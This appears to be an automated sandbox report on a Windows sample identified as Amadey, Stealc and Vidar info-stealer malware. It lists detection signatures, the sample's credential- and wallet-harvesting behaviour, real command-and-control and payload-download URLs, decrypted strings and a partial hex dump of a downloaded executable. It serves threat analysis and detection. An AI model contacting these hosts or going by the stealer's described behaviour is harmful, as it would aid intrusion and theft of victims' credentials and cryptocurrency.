Windows Analysis Report
wqmnYoVbHr.exe

Overview

General Information

Sample name: wqmnYoVbHr.exe
renamed because original name is a hash value
Original sample name: 278754c8f6050d4bbf4d9a243f048429.exe
Analysis ID: 1463419
MD5: 278754c8f6050d4bbf4d9a243f048429
SHA1: 7f5fea45aece28601ef66caa6d2174cd1657d60e
SHA256: d2105345952320d956616ccf74f73024420f7619f745c5c1e06a272bcd7199dc
Tags: 32exetrojan
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: wqmnYoVbHr.exe Avira: detected
Antivirus detection for URL or domain
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/X Avira URL Cloud: Label: malware
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllk Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll5 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/t Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllW Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php8L Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpD Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllM Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpU Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exepera Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllk Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpr Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeAppData Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllS Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000000.00000002.2291406262.00000000016CE000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Multi AV Scanner detection for domain / URL
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 27% Perma Link
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 26% Perma Link
Source: http://85.28.47.4/ Virustotal: Detection: 14% Perma Link
Source: http://147.45.47.155/ku4Nor9/index.php Virustotal: Detection: 21% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Virustotal: Detection: 7% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Virustotal: Detection: 7% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Virustotal: Detection: 6% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Virustotal: Detection: 9% Perma Link
Source: http://77.91.77.81/mine/amadka.exe00 Virustotal: Detection: 25% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Virustotal: Detection: 6% Perma Link
Source: http://85.28.47.4/920475a59bac849d.phpD Virustotal: Detection: 13% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php Virustotal: Detection: 18% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Virustotal: Detection: 21% Perma Link
Source: http://77.91.77.81/cost/go.exe00 Virustotal: Detection: 25% Perma Link
Source: http://85.28.47.4 Virustotal: Detection: 14% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe ReversingLabs: Detection: 52%
Multi AV Scanner detection for submitted file
Source: wqmnYoVbHr.exe ReversingLabs: Detection: 52%
Source: wqmnYoVbHr.exe Virustotal: Detection: 43% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: wqmnYoVbHr.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetProcAddress
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: lstrcatA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: OpenEventA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: CreateEventA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: CloseHandle
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: Sleep
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: VirtualFree
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: HeapAlloc
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: lstrcpyA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: lstrlenA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: ExitProcess
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetSystemTime
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: advapi32.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: gdi32.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: user32.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: crypt32.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: ntdll.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetUserNameA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: CreateDCA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: ReleaseDC
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: sscanf
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: VMwareVMware
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: HAL9TH
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: JohnDoe
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: DISPLAY
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: http://85.28.47.4
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: default
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GlobalLock
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: HeapFree
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetFileSize
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GlobalSize
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: IsWow64Process
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: Process32Next
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetLocalTime
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: FreeLibrary
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: Process32First
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: DeleteFileA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: FindNextFileA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: LocalFree
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: FindClose
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: LocalAlloc
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: ReadFile
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: SetFilePointer
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: WriteFile
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: CreateFileA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: CopyFileA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: VirtualProtect
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetLastError
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: lstrcpynA
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GlobalFree
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: OpenProcess
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: TerminateProcess
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: ole32.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: wininet.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: shell32.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: psapi.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: SelectObject
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: BitBlt
Source: 0.2.wqmnYoVbHr.exe.580000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C8D6C80
Uses 32bit PE files
Source: wqmnYoVbHr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: wqmnYoVbHr.exe, 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: wqmnYoVbHr.exe, 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49711 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49711 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.6:49711
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49711 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.6:49711
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:49728 -> 147.45.47.155:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 147.45.47.155:80 -> 192.168.2.6:49728
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 27 Jun 2024 03:58:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
